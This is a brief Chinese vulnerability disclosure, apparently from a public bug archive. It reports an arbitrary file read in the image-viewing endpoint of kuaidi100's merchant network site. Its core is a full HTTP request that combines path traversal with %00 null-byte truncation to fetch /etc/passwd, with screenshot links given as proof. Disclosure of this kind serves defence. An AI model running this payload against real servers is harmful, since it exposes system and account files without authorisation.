### 简要描述:
RT
### 详细说明:
```
http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView
```
照片查看任意文件读取,通过 %00截断
```
GET /youshang-network/getImage?path=2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg HTTP/1.1
Host: net.kuaidi100.com
Proxy-Connection: keep-alive
Accept: image/webp,*/*;q=0.8
User-Agent:
Referer: http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:
```
[<img src="https://images.seebug.org/upload/201507/22134906157572b036364153e907cc7837e454c9.png" alt="金碟2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/22134906157572b036364153e907cc7837e454c9.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201507/2213483934019afba6694a12223131981b638be4.png" alt="金碟1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/2213483934019afba6694a12223131981b638be4.png)
京公网安备 11010502034610号
暂无评论